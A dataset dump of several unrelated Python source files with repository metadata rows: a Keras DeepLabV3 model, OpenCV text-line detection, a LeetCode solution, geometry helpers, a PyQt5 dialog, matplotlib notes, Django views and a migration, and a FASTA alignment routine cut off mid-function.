d4=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=18,use_bias=False)(x)
d4=BatchNormalization()(d4)
d4=Activation("relu")(d4)
d4=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d4)
d4=BatchNormalization()(d4)
d4=Activation("relu")(d4)
d5=AveragePooling2D(pool_size=(int(np.ceil(input_shape[0]/8)),int(np.ceil(input_shape[1]/8))))(x)
d5=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d5)
d5=BatchNormalization()(d5)
d5=Activation("relu")(d5)
d5=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(int(np.ceil(input_shape[0]/8)),int(np.ceil(input_shape[1]/8)))))(x)
x=Concatenate()([d1,d2,d3,d4,d5])
x=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Dropout(0.1)(x)
x=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(int(np.ceil(input_shape[0]/4)),int(np.ceil(input_shape[1]/4)))))(x)
skip=Conv2D(filters=48,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
skip=BatchNormalization()(skip)
skip=Activation("relu")(skip)
x=Concatenate()([x,skip])
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation('relu')(x)
x=Conv2D(classes,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(input_shape[0],input_shape[1])))(x)
x=Reshape((input_shape[0]*input_shape[1],classes))(x)
x=Activation("softmax")(x)
if input_tensor is not None:
input=get_source_inputs(input_tensor)
else:
input=input
model=Model(input,x,name="deeplabv3")
model.compile(optimizer=Adam(lr=7e-4,epsilon=1e-8,decay=1e-6),loss=sparse_crossentropy_ignoring_last_label,metrics=[sparse_accuracy_ignoring_last_label,Jaccard])
return model
model=DeepLabV3()
model.summary()
# def get_model():
# input= | UTF-8 | Python | false | false | 9,153 | py | 5 | model.py | 5 | 0.679449 | 0.641538 | 0 | 211 | 42.383886 | 165 |
JosephFranc/scribe | 15,212,774,192,247 | d2ec5be62115b9479d01ea7c431c497c4c319929 | 187b793afe39b5de5ea9f90adf721cc9274722ca | /getTextLineDots.py | a872dbac89d7383035c8d9f2eb48c11ee9afc9f0 | []
| no_license | https://github.com/JosephFranc/scribe | 890614e65b41a93a08cb863b1de014106cb2c79b | 7b8691104968d3b209a71321028e5fdf754530fe | refs/heads/master | 2020-12-24T11:36:56.262299 | 2016-12-17T03:48:46 | 2016-12-17T03:48:46 | 73,027,666 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2
'''
Find bottom points of each line of text that could do robust linear regression on
Dots are shown in green circles (r = 1 pixel)
'''
def getTextLineBox(gray):
_,thresh = cv2.threshold(gray,150,255,cv2.THRESH_BINARY_INV) # threshold
kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))
dilated = cv2.dilate(thresh,kernel,iterations = 2) # need calibration on this for different format
cv2.imwrite("out.jpg", dilated)
out, contours, hierarchy = cv2.findContours(dilated,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE) # get contours
pts = []
# for each contour found, draw a rectangle around it on original image
for contour in contours:
# get rectangle bounding contour
[x,y,w,h] = cv2.boundingRect(contour) # can return this box here
# branch and bound
# # discard areas that are too small
if h<8 or w<8:
continue
for i in range(x, x+w, 1):
#cv2.circle(image, (x+i,y+h), 1, (0,255,0)) # illustrate
pts.append((x+i,y+h))
return pts
| UTF-8 | Python | false | false | 1,074 | py | 17 | getTextLineDots.py | 16 | 0.648976 | 0.620112 | 0 | 32 | 32.5625 | 111 |
HenryBalthier/Python-Learning | 3,186,865,752,570 | 1c6aa52cfe852f1e582d5dc91cfb55daa14e5c3e | ad43681693a65fee270ef8d6ab1ed2b59c5391f2 | /Leetcode_medium/array/39.py | 862245caa5dfdb4ea2b7667e661da424b2b04a66 | []
| no_license | https://github.com/HenryBalthier/Python-Learning | 7def31dad56a9d754762839000733fd9443c4576 | 93cbb01487a61e37159e8bdd4bf40f623e131c19 | refs/heads/master | 2021-01-24T08:11:39.857854 | 2017-09-24T12:19:27 | 2017-09-24T12:19:27 | 93,374,219 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def combinationSum(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
if candidates == []:
return []
cand = sorted(candidates, reverse=True)
result = []
lenth = len(cand)
def helper(res, index):
if index >= lenth:
return
s = sum(res)
for i, v in enumerate(cand[index:]):
if s + v < target:
helper(res+[v], index+i)
elif s + v > target:
continue
else:
result.append(res + [v])
helper([], 0)
return result
s = Solution()
x = [2,3,4,1]
t = 7
print(s.combinationSum(x, t)) | UTF-8 | Python | false | false | 820 | py | 237 | 39.py | 235 | 0.442683 | 0.435366 | 0 | 31 | 25.483871 | 49 |
octeufer/Annotate_Optimize | 19,052,474,937,464 | f699b4d17589eb1e91aefc6c2090f5ef23e11241 | 5c0ed45894794670f6a5f18992d8c1f1f481c510 | /crossalgorithm.py | 5bbe6662e2a449528cc4f25fa8d3b8771f3eb310 | [
"Apache-2.0"
]
| permissive | https://github.com/octeufer/Annotate_Optimize | 97275eb96a6df37f7389181df84659a9ebfaec44 | 32d9cecc0159882d3f962990aba07168c4a023f5 | refs/heads/master | 2022-09-09T09:43:26.362393 | 2020-06-02T21:47:20 | 2020-06-02T21:47:20 | 54,598,397 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def crossornot(line1,line2):
d1 = crossf(line1[0],line1[1],line1[0],line2[0])
d2 = crossf(line1[0],line1[1],line1[0],line2[1])
d3 = crossf(line2[0],line2[1],line2[0],line1[0])
d4 = crossf(line2[0],line2[1],line2[0],line1[1])
if d1*d2 < 0 and d3*d4 < 0:
return True
else:
return False
def crossf(p1,p2,q1,q2):
x1 = p2[0] - p1[0]
y1 = p2[1] - p1[1]
x2 = q2[0] - q1[0]
y2 = q2[1] - q1[1]
return x1*y2 - x2*y1
def getsegs(roadpath):
segs=list()
reader = shapefile.Reader(roadpath)
for sr in reader.shapeRecords():
segs.extend([(sr.shape.__geo_interface__["coordinates"][i],sr.shape.__geo_interface__["coordinates"][i+1]) for i in range(len(sr.shape.__geo_interface__["coordinates"])-1)])
npsegs = np.array(segs)
return segs,npsegs
def psnapseg(p,segs):
nearestseg = tuple()
nearest = float(1000000000000000)
for seg in segs:
xmid = (float(seg[0][0]) + float(seg[1][0])) / 2
ymid = (float(seg[0][1]) + float(seg[1][1])) / 2
dis = math.sqrt(math.pow((p[0]-xmid), 2) + math.pow((p[1]-ymid),2))
#print nearest,dis
if dis < nearest:
nearest = dis
nearestseg = seg
return nearestseg | UTF-8 | Python | false | false | 1,286 | py | 9 | crossalgorithm.py | 8 | 0.553738 | 0.472741 | 0 | 37 | 32.756757 | 181 |
d33psky/mountwizzard | 13,632,226,206,190 | a4442fdd5f08f8b3307f66e41ccd30bcfcc26a1c | ecd8456f0ce01d6020a085fdbf789c9902fc4fd0 | /mountwizzard/support/coordinate_dialog_ui.py | e9ae549688adcc0dfe8652faefce1143e1423c04 | []
| no_license | https://github.com/d33psky/mountwizzard | 05fd28ae650c92d7aa3135927320c37b2fae61ab | cbd17d722cafe1f8e1316bce5f8bcbfa8005ac6b | refs/heads/master | 2021-01-17T14:05:32.899626 | 2017-03-16T19:39:14 | 2017-03-16T19:39:14 | 83,466,180 | 0 | 0 | null | true | 2017-02-28T18:33:46 | 2017-02-28T18:33:46 | 2017-02-22T22:35:02 | 2017-02-26T19:53:02 | 31,502 | 0 | 0 | 0 | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'coordinate_dialog_ui.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CoordinateDialog(object):
    """Auto-generated PyQt5 form for the pointing-coordinates / modelling window.

    Do NOT edit by hand: this class is produced by pyuic5 from
    'coordinate_dialog_ui.ui' (see the header warning) and any manual change
    is lost on regeneration. Change the .ui file instead.
    """
    def setupUi(self, CoordinateDialog):
        """Create and lay out all child widgets on *CoordinateDialog*."""
        CoordinateDialog.setObjectName("CoordinateDialog")
        CoordinateDialog.resize(791, 671)
        # title banner across the top of the dialog
        self.windowTitle = QtWidgets.QLabel(CoordinateDialog)
        self.windowTitle.setGeometry(QtCore.QRect(0, 0, 791, 31))
        font = QtGui.QFont()
        font.setFamily("MS Shell Dlg 2")
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.windowTitle.setFont(font)
        self.windowTitle.setAutoFillBackground(True)
        self.windowTitle.setAlignment(QtCore.Qt.AlignCenter)
        self.windowTitle.setObjectName("windowTitle")
        # close button in the top-right corner
        self.btn_selectClose = QtWidgets.QPushButton(CoordinateDialog)
        self.btn_selectClose.setGeometry(QtCore.QRect(750, 0, 41, 31))
        font = QtGui.QFont()
        font.setPointSize(10)
        font.setBold(True)
        font.setWeight(75)
        self.btn_selectClose.setFont(font)
        self.btn_selectClose.setObjectName("btn_selectClose")
        # graphics view that plots the model points
        self.modelPointsPlot = QtWidgets.QGraphicsView(CoordinateDialog)
        self.modelPointsPlot.setGeometry(QtCore.QRect(10, 70, 771, 371))
        self.modelPointsPlot.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.ArrowCursor))
        self.modelPointsPlot.setAcceptDrops(False)
        self.modelPointsPlot.setAutoFillBackground(True)
        self.modelPointsPlot.setFrameShadow(QtWidgets.QFrame.Plain)
        self.modelPointsPlot.setInteractive(False)
        self.modelPointsPlot.setSceneRect(QtCore.QRectF(0.0, 0.0, 769.0, 369.0))
        self.modelPointsPlot.setObjectName("modelPointsPlot")
        # read-only text browser showing the modelling log
        self.modellingLog = QtWidgets.QTextBrowser(CoordinateDialog)
        self.modellingLog.setGeometry(QtCore.QRect(10, 450, 771, 211))
        font = QtGui.QFont()
        font.setFamily("MS Shell Dlg 2")
        font.setPointSize(8)
        self.modellingLog.setFont(font)
        self.modellingLog.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        self.modellingLog.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.modellingLog.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
        self.modellingLog.setAcceptRichText(False)
        self.modellingLog.setObjectName("modellingLog")
        # read-only azimuth display field
        self.le_telescopeAzimut = QtWidgets.QLineEdit(CoordinateDialog)
        self.le_telescopeAzimut.setGeometry(QtCore.QRect(60, 40, 81, 21))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.le_telescopeAzimut.setFont(font)
        self.le_telescopeAzimut.setMouseTracking(False)
        self.le_telescopeAzimut.setFocusPolicy(QtCore.Qt.NoFocus)
        self.le_telescopeAzimut.setAcceptDrops(False)
        self.le_telescopeAzimut.setLayoutDirection(QtCore.Qt.RightToLeft)
        self.le_telescopeAzimut.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.le_telescopeAzimut.setReadOnly(True)
        self.le_telescopeAzimut.setObjectName("le_telescopeAzimut")
        # read-only altitude display field
        self.le_telescopeAltitude = QtWidgets.QLineEdit(CoordinateDialog)
        self.le_telescopeAltitude.setGeometry(QtCore.QRect(210, 40, 81, 21))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.le_telescopeAltitude.setFont(font)
        self.le_telescopeAltitude.setMouseTracking(False)
        self.le_telescopeAltitude.setFocusPolicy(QtCore.Qt.NoFocus)
        self.le_telescopeAltitude.setAcceptDrops(False)
        self.le_telescopeAltitude.setLayoutDirection(QtCore.Qt.RightToLeft)
        self.le_telescopeAltitude.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.le_telescopeAltitude.setReadOnly(True)
        self.le_telescopeAltitude.setObjectName("le_telescopeAltitude")
        # static "AZ:" / "ALT:" labels
        self.label_9 = QtWidgets.QLabel(CoordinateDialog)
        self.label_9.setGeometry(QtCore.QRect(20, 40, 31, 21))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.label_9.setFont(font)
        self.label_9.setObjectName("label_9")
        self.label_10 = QtWidgets.QLabel(CoordinateDialog)
        self.label_10.setGeometry(QtCore.QRect(170, 40, 41, 21))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.label_10.setFont(font)
        self.label_10.setObjectName("label_10")
        # degree-symbol labels for the two coordinate read-outs
        self.label_109 = QtWidgets.QLabel(CoordinateDialog)
        self.label_109.setGeometry(QtCore.QRect(140, 40, 21, 20))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label_109.setFont(font)
        self.label_109.setAlignment(QtCore.Qt.AlignCenter)
        self.label_109.setWordWrap(False)
        self.label_109.setObjectName("label_109")
        self.label_110 = QtWidgets.QLabel(CoordinateDialog)
        self.label_110.setGeometry(QtCore.QRect(290, 40, 21, 20))
        font = QtGui.QFont()
        font.setFamily("Courier")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label_110.setFont(font)
        self.label_110.setAlignment(QtCore.Qt.AlignCenter)
        self.label_110.setWordWrap(False)
        self.label_110.setObjectName("label_110")
        self.retranslateUi(CoordinateDialog)
        QtCore.QMetaObject.connectSlotsByName(CoordinateDialog)
    def retranslateUi(self, CoordinateDialog):
        """Install translated (or default) text on every widget."""
        _translate = QtCore.QCoreApplication.translate
        CoordinateDialog.setWindowTitle(_translate("CoordinateDialog", "Form"))
        self.windowTitle.setText(_translate("CoordinateDialog", "Pointing Coordinates / Modeling"))
        self.btn_selectClose.setToolTip(_translate("CoordinateDialog", "Sets dual tracking on / off"))
        self.btn_selectClose.setText(_translate("CoordinateDialog", "X"))
        self.modellingLog.setHtml(_translate("CoordinateDialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
        self.le_telescopeAzimut.setText(_translate("CoordinateDialog", "130,05"))
        self.le_telescopeAltitude.setText(_translate("CoordinateDialog", "80,50"))
        self.label_9.setText(_translate("CoordinateDialog", "AZ:"))
        self.label_10.setText(_translate("CoordinateDialog", "ALT:"))
        self.label_109.setText(_translate("CoordinateDialog", "°"))
        self.label_110.setText(_translate("CoordinateDialog", "°"))
| UTF-8 | Python | false | false | 7,427 | py | 14 | coordinate_dialog_ui.py | 10 | 0.691178 | 0.658855 | 0 | 144 | 50.555556 | 174 |
north-jewel/data_analysis | 13,761,075,243,114 | ffc15645c52a881e3ad0ec51fb997880c1c2d6f4 | a886d4a2fc8febfff2686cb829b9cfaba2945f43 | /homework/赵孟-mrzhao666/笔记/画图笔记.py | d865d9cda370170fb7dc3ae6e36daa7cae5491f1 | []
| no_license | https://github.com/north-jewel/data_analysis | 017f4eedd6c1f00f187f9736d1b9afd980e97e0b | 6e077a6d777d9a339095fb133b7d9a6f9d408743 | refs/heads/master | 2020-04-03T20:32:39.514601 | 2019-01-06T12:52:16 | 2019-01-06T12:52:16 | 155,548,428 | 8 | 6 | null | false | 2018-11-20T09:13:38 | 2018-10-31T11:46:17 | 2018-11-20T09:11:40 | 2018-11-20T09:13:37 | 1,467 | 4 | 3 | 0 | Jupyter Notebook | false | null | import matplotlib.pyplot as plt
# NOTE(review): this file is a personal matplotlib cheat sheet, not runnable
# code -- names like x, y, sizes, fig and the Chinese identifiers below are
# placeholders. Comments translated to English; code left untouched.
# scatter plot; marker sets the point shape
plt.scatter(x,y,s = 大小,c = 颜色,marker = '*')
# bar chart
plt.bar(x,height = y,bottom = '从哪里开始图色')
# pie chart; arguments: data, wedge offsets (explode), labels,
# decimal places of the percentage, shadow on/off, start angle in degrees
plt.pie(sizes,explode = explode,
labels = labels,autopct = '%1.2f%%',shadow = True,startangle = 90)
plt.plot(x,y,color = 'red',linewidth = 4.0,linestyle = '--',label='sin',alpha = 0.5)
# linewidth: line width, linestyle: line style, label: legend entry, alpha: transparency
plt.legend() # must be called for the label= entries to take effect
plt.figure(1)# figure number to draw on
# display Chinese characters and the minus sign correctly
from pylab import mpl
mpl.rcParams['font.sans-serif']=['SimHei'] # Chinese-capable font
mpl.rcParams['axes.unicode_minus']=False # minus sign
plt.title('表头名字')
plt.xlabel('x轴名字')
plt.ylabel('y轴名字')
# set the axes position/size; third argument is width, fourth is height,
# as fractions of the figure
# facecolor: background colour
plt.axes([1,0,1,1],facecolor = 'red')
# save the drawn figure to disk
plt.savefig(r'C:/Users/赵孟/Desktop/微信.png')
# three digits: split the canvas into a 3x3 grid, this plot takes slot 1
ax = fig.add_subplot(331)
# the call below overlays a grid on the plot
plt.grid()
# set the numeric range of the axes
plt.xlim([-1.5,1.5])
plt.ylim([-1.5,1.5])
# this call is required before manipulating the axes object
ax = plt.gca()
# hide the right spine
ax.spines['right'].set_color('none')
# move the left and bottom spines to data coordinate 1
ax.spines['left'].set_position(('data',1))
ax.spines['bottom'].set_position(('data',1))
# change where the x and y tick marks are drawn
ax.xaxis.set_ticks_position('top')
ax.yaxis.set_ticks_position('left')
# set the x/y aspect ratio
ax.set_aspect(1)
# replace the tick labels on an axis
plt.yticks(原标记,np.linspace(-1,1,5))
plt.xticks([-np.pi,-np.pi/2,0.9,np.pi/2,np.pi],[r'$-\pi$',r'$-\pi/2$',r'$0$',r'$+\pi/2$',r'$\pi$'])
# fill a region with colour
plt.fill(x,y,'颜色')
# iterate over the x/y tick labels and restyle them
for label in ax.get_xticklabels()+ax.get_yticklabels():
    label.set_fontsize(12)# font size
    label.set_bbox(dict(facecolor='yellow',edgecolor='red',alpha = 0.8))
    # facecolor: label background colour, edgecolor: border colour, alpha: transparency
# annotation
plt.annotate("(4,4)",xy=(4,4),xycoords='data',xytext=(3,2),
arrowprops = dict(arrowstyle='<|-|>'))
# xytext: absolute position of the annotation text; defaults to the xy point
# textcoords: how the offset is interpreted (relative to the point or in pixels)
# arrowprops: the arrow; arrowstyle / connectionstyle set its appearance
| UTF-8 | Python | false | false | 2,556 | py | 488 | 画图笔记.py | 202 | 0.674332 | 0.647594 | 0 | 91 | 19.494505 | 99 |
dash1291/smexplorer | 3,384,434,242,900 | 1c6ae39dad5d277561f5c3cdd0d4f36f47849541 | f2bde53e6d7182823c3241a2d924e31ce88ac9ca | /api/views.py | 0608f53525025e95d7f2064be94ee8b8f4ad7ce9 | []
| no_license | https://github.com/dash1291/smexplorer | 1ed1a4303a2a812c202de3343adb4fbb34245f10 | f431431f0b009db80be51d1acc9e419730740b52 | refs/heads/master | 2022-01-24T01:12:48.022959 | 2012-11-28T12:11:49 | 2012-11-28T12:11:49 | 3,686,886 | 1 | 0 | null | false | 2022-01-06T22:22:55 | 2012-03-11T13:29:10 | 2014-01-20T14:30:59 | 2022-01-06T22:22:55 | 528 | 4 | 3 | 2 | Python | false | false | from django.http import HttpResponse
from api.helpers import encode_xml, encode_json
from explorer.models import Directory, File
class ApiBase(object):
    """Base class for API views: negotiates the response format (json/xml),
    delegates to the subclass's process_request(), and encodes responses.
    """

    def __call__(self, request, *args, **kwargs):
        """Entry point: read the requested format and dispatch."""
        self.format = request.REQUEST.get('format')
        # BUG FIX: the original compared against 'xml ' (trailing space), so
        # the XML mimetype could never be selected.
        self.mimetype = ('text/xml' if self.format == 'xml' else 'application/json')
        self.process_request(*args, **kwargs)

    def build_response(self, response_array):
        """Encode *response_array* in the negotiated format and return the string.

        BUG FIX: encode_xml/encode_json are module-level helpers imported from
        api.helpers, not methods; the original called self.encode_xml /
        self.encode_json (AttributeError) and then clobbered the result with an
        undefined self.encode_response() call.
        """
        if self.format == 'xml':
            return encode_xml(response_array)
        return encode_json(response_array)

    def render(self, response_array):
        """Wrap the encoded response in a Django HttpResponse."""
        return HttpResponse(self.build_response(response_array))
class DataApi(ApiBase):
    """API endpoint that lists the files stored under a directory path.

    NOTE(review): ``process_request`` references ``object_type``, ``action``
    and ``uid`` which are defined nowhere in this scope -- calling it as
    written raises NameError. They were presumably meant to come from
    ``kwargs``; confirm against the URL routing that invokes this view.
    """
    def process_request(self, *args, **kwargs):
        # dispatch on the requested object type and action
        if object_type == 'folder':
            if action == 'list':
                self.list_directory(uid)
    def list_directory(self, file_path):
        """Render a listing of the File rows whose path equals *file_path*."""
        files = File.objects.filter(path=file_path)
        files_array = []
        for file in files:
            files_array.append({'name': file.name})
        return self.render({'files': files_array})
jmhubbard/quote_of_the_day_custom_user | 14,113,262,554,693 | 06044e1a90200ea2fd43df4a1c20efba2d3f4cda | c074fb834cb4a8ac75d107146df10f9496590792 | /shows/migrations/0003_show_subscribers.py | d41d63880823db5c96ce280c69de7690bd2261cb | [
"Unlicense"
]
| permissive | https://github.com/jmhubbard/quote_of_the_day_custom_user | 4d5ffd4183d7e6290161b84cae2aa1f7ad621a99 | 27024b2953c1c94fd2970563c3ab31ad444912b6 | refs/heads/master | 2023-02-19T00:59:27.372671 | 2021-01-10T02:45:56 | 2021-01-10T02:45:56 | 293,443,918 | 1 | 0 | Unlicense | false | 2020-12-03T17:59:59 | 2020-09-07T06:41:25 | 2020-12-03T08:41:21 | 2020-12-03T17:59:59 | 607 | 1 | 0 | 0 | Python | false | false | # Generated by Django 3.1.1 on 2020-09-09 03:24
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds the many-to-many ``subscribers``
    field to the ``Show`` model, routed through ``subscriptions.Subscription``.
    Do not edit by hand; generated by Django 3.1.1 (see the file header).
    """
    # migrations that must be applied before this one
    dependencies = [
        ('subscriptions', '0002_subscription_is_subscribed'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('shows', '0002_show_name'),
    ]
    operations = [
        migrations.AddField(
            model_name='show',
            name='subscribers',
            # through= keeps the explicit Subscription model as the join table
            field=models.ManyToManyField(through='subscriptions.Subscription', to=settings.AUTH_USER_MODEL),
        ),
    ]
| UTF-8 | Python | false | false | 596 | py | 81 | 0003_show_subscribers.py | 58 | 0.647651 | 0.60906 | 0 | 21 | 27.380952 | 108 |
FaiZaman/Dynamic-Heuristic-Local-Alignments | 18,614,388,276,960 | 5e957e3e4cfcdcf17e6d97251fd4a948646b5d0b | dfcaa807af88352027a5ec63418b42cf6daaa883 | /FASTA.py | ae4f4591f04085bdfdf27a52da94c234a9b5c21e | [
"MIT"
]
| permissive | https://github.com/FaiZaman/Dynamic-Heuristic-Local-Alignments | 2093cc8ddfef54aceeb01ce0c7cd684351cd85e8 | 15bff8ddbf66e4c6bb53537562f8976752cef935 | refs/heads/master | 2020-09-21T20:17:10.457814 | 2019-12-08T14:33:25 | 2019-12-08T14:33:25 | 224,914,557 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from heapq import nlargest
def heuralign(alphabet, substitution_matrix, seq1, seq2):
    """FASTA-style heuristic local alignment of seq1 against seq2.

    Seeds exact ktup-length word matches, scores the diagonals they lie on,
    then runs banded dynamic programming over the best few diagonals.
    Returns (score, seq1_indices, seq2_indices) of the best local alignment.
    """
    # tuning parameters
    ktup = 2           # length of the exact word matches used as seeds
    cutoff_score = -3  # score floor while extending a diagonal run
    width = 29         # half-width of the band used by the banded DP
    n = 3              # how many top-scoring diagonals to hand to the DP
    seeds = get_seeds(ktup, get_index_table(ktup, seq1), seq2)
    scores = score_diagonals(alphabet, substitution_matrix, seq1, seq2, ktup, cutoff_score, seeds)
    top_diagonals = nlargest(n, scores, key=scores.get)
    result = banded_DP(alphabet, substitution_matrix, seq1, seq2, top_diagonals, width)
    return (int(result[0]), result[1], result[2])
def get_index_table(ktup, seq1):
    """Build the FASTA word lookup table for *seq1*.

    Maps every length-*ktup* substring of seq1 to the sorted list of start
    positions where it occurs.
    """
    index_table = {}
    for letter_index in range(0, len(seq1) - ktup + 1):
        match = seq1[letter_index:letter_index + ktup]
        # setdefault replaces the original membership-test-then-append branch
        index_table.setdefault(match, []).append(letter_index)
    return index_table
def get_seeds(ktup, index_table, seq2):
    """Find seed matches between seq2 and the word table built from seq1.

    A seed is a (seq1_position, seq2_position) pair where the same ktup-word
    occurs in both sequences; seeds are grouped by their diagonal
    (seq1_position - seq2_position).
    """
    seeds = {}
    for letter_index in range(0, len(seq2) - ktup + 1):
        match = seq2[letter_index:letter_index + ktup]
        # .get with an empty default folds the original 'if match in table'
        # guard into the loop; setdefault replaces the append/create branch
        for seq1_position in index_table.get(match, ()):
            diagonal = seq1_position - letter_index
            seeds.setdefault(diagonal, []).append((seq1_position, letter_index))
    return seeds
def score_diagonals(alphabet, substitution_matrix, seq1, seq2, ktup, cutoff_score, diagonal_seeds):
    """Score every seeded diagonal by greedily extending each seed.

    Each seed is extended left and right along its diagonal while the running
    score stays above *cutoff_score*; the best score seen on a diagonal is
    recorded. Seeds absorbed by an extended run are removed from
    *diagonal_seeds* (the dict is mutated in place).

    Returns a dict mapping diagonal -> best extension score found on it.
    """
    # one best score per diagonal, initialised to 0
    diagonal_score = {}
    for diagonal in diagonal_seeds:
        diagonal_score[diagonal] = 0
    for diagonal in diagonal_seeds:
        for (seed_i, seed_j) in diagonal_seeds[diagonal]:
            updated = True
            # score of matching the exact ktup-long seed region
            current_score = 0
            for k in range(0, ktup):
                seq1_letter = seq1[seed_i + k]
                seq2_letter = seq2[seed_j + k]
                current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
            # current_* cursors walk outwards; best_* remember the extent of
            # the highest-scoring window found so far
            max_score = current_score
            seq1_current_start_index = seed_i
            seq2_current_start_index = seed_j
            seq1_current_end_index = seed_i + ktup
            seq2_current_end_index = seed_j + ktup
            seq1_best_start_index = seed_i
            seq2_best_start_index = seed_j
            seq1_best_end_index = seed_i + ktup
            seq2_best_end_index = seed_j + ktup
            while updated:
                updated = False
                while current_score > cutoff_score:  # extend left
                    seq1_current_start_index -= 1
                    seq2_current_start_index -= 1
                    if seq1_current_start_index < 0 or seq2_current_start_index < 0:
                        break
                    seq1_letter = seq1[seq1_current_start_index]
                    seq2_letter = seq2[seq2_current_start_index]
                    current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
                    if current_score > max_score:
                        updated = True
                        max_score = current_score
                        seq1_best_start_index = seq1_current_start_index
                        seq2_best_start_index = seq2_current_start_index
                # rewind the cursors to the best start found so far
                seq1_current_start_index = seq1_best_start_index
                # BUG FIX: the original reset the seq2 cursor from
                # seq1_best_start_index (copy/paste typo, asymmetric with the
                # end-index reset below)
                seq2_current_start_index = seq2_best_start_index
                while current_score > cutoff_score:  # extend right
                    seq1_current_end_index += 1
                    seq2_current_end_index += 1
                    if seq1_current_end_index > len(seq1) - 1 or seq2_current_end_index > len(seq2) - 1:
                        break
                    seq1_letter = seq1[seq1_current_end_index]
                    seq2_letter = seq2[seq2_current_end_index]
                    current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
                    if current_score > max_score:
                        updated = True
                        max_score = current_score
                        seq1_best_end_index = seq1_current_end_index
                        seq2_best_end_index = seq2_current_end_index
                seq1_current_end_index = seq1_best_end_index
                seq2_current_end_index = seq2_best_end_index
                # drop seeds absorbed by the extended region.
                # BUG FIX: the original deleted from the list while iterating
                # it, which skips the element after each deletion; iterate a
                # snapshot and remove from the live list instead.
                for absorbed in list(diagonal_seeds[diagonal]):
                    (seed_k, seed_l) = absorbed
                    if seed_k != seed_i and seed_l != seed_j:  # not the current seed
                        if seq1_best_start_index < seed_k < seq1_best_end_index:
                            diagonal_seeds[diagonal].remove(absorbed)
            diagonal_score[diagonal] = max(diagonal_score[diagonal], max_score)
    return diagonal_score
def banded_DP(alphabet, substitution_matrix, seq1, seq2, best_diagonals, width):
    """Run banded Smith-Waterman around each candidate diagonal.

    For every diagonal in *best_diagonals* a band of half-width *width* is
    filled; the backtracking matrix of the globally best-scoring band is kept
    and traced back with get_indices().

    Returns (best_score, seq1_indices, seq2_indices).
    """
    diagonal_max_score = 0
    diagonal_max_score_row = -1
    diagonal_max_score_column = -1
    # BUG FIX: np.zeros instead of np.empty -- np.empty leaves arbitrary
    # garbage in cells the band never writes, which get_indices (and the
    # neighbour reads in calculate_score_data) would otherwise consume.
    diagonal_backtracking_matrix = np.zeros((len(seq2) + 1, len(seq1) + 1))
    for diagonal in best_diagonals:
